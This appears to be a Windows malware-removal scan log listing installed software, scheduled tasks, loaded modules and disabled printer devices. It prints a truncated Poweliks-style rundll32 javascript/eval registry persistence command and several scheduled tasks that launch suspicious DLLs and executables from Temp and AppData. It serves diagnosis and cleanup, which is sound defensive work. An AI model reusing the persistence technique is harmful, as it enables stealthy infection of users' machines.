Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden

CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden

ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden

ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden

CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)

Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)

Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)

Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)

Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)

Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)

Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)

Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden

DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden

DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden

DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden

EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )

Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)

Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)

GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)

HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)

HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)

HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)

HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)

HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)

HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)

HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)

iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)

iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)

Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)

Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)

MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden

MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)

Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)

Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden

Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden

Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)

Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) Hidden

Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden

Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) Hidden

Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden

Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)

Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)

Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden

OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)

PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)

ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden

QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)

Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)

Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )

Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden

Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)

Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden

Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden

Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden

SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)

SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)

SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden

Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden

Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)

Skins (Version: 2007.0731.2234.38497 - ATI) Hidden

SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden

SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)

Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)

TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden

UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden

Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)

Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)

Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)

Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)

Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)

Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)

Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)

Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)

Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)

WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

25-07-2014 04:00:07 Scheduled Checkpoint

29-07-2014 11:25:23 Scheduled Checkpoint

30-07-2014 11:45:57 Scheduled Checkpoint

01-08-2014 21:10:36 Scheduled Checkpoint

02-08-2014 16:42:56 Scheduled Checkpoint

04-08-2014 04:00:03 Scheduled Checkpoint

07-08-2014 22:48:19 Scheduled Checkpoint

11-08-2014 02:11:41 Scheduled Checkpoint

11-08-2014 15:01:42 Scheduled Checkpoint

12-08-2014 10:45:08 Scheduled Checkpoint

14-08-2014 02:36:25 Scheduled Checkpoint

14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:59

14-08-2014 23:31:34 Advanced-System Protector

15-08-2014 23:47:04 Removed SofTest

16-08-2014 13:18:06 Removed DriverUpdate

16-08-2014 13:29:10 Removed HTC Sync.

16-08-2014 13:44:46 Removed HTC Sync.

16-08-2014 14:02:17 Removed HTC BMP USB Driver.

16-08-2014 16:47:50 Advanced-System Protector

16-08-2014 21:58:06 Installed AVG 2014

16-08-2014 22:11:41 Removed SlimCleaner Plus

16-08-2014 22:14:50 Removed HTC Driver Installer.

17-08-2014 19:56:09 Installed AVG 2014

17-08-2014 19:59:04 Installed AVG 2014

17-08-2014 20:03:04 Removed AVG 2014

17-08-2014 20:04:51 Installed AVG 2011

17-08-2014 21:08:16 Installed AVG 2014

17-08-2014 21:16:20 Installed AVG 2014

17-08-2014 21:24:43 Removed AVG 2014

17-08-2014 21:26:10 Installed AVG 2011

19-08-2014 21:04:48 Advanced-System Protector

21-08-2014 01:40:12 Advanced-System Protector

23-08-2014 20:47:11 Checkpoint by HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-08-23 14:19 - 2014-08-23 14:19 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)

Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM

Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION

Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe

Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe

Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)

Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)

Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)

Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer

Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI

Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe

Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages

Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)

Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe

Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)

Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION

Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe

Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)

Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)

Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()

Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe

Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

==================== Loaded Modules (whitelisted) =============

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe

2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe

2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll

2008-08-06 15:17 - 2007-08-20 01:08 - 00159744 _____ () C:\Windows\system32\atitmmxx.dll

2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll

2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll

2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll

2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll

2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe

2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll

2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4

AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #2

Description: Microsoft 6to4 Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Microsoft

Service: tunnel

Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)

Resolution: Update the driver

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet 1022n

Description: HP LaserJet 1022n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6940 series

Description: Deskjet 6940 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: hp LaserJet 2420

Description: hp LaserJet 2420

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet CP1025nw

Description: HP LaserJet CP1025nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet 200 color M251nw

Description: HP LaserJet 200 color M251nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard
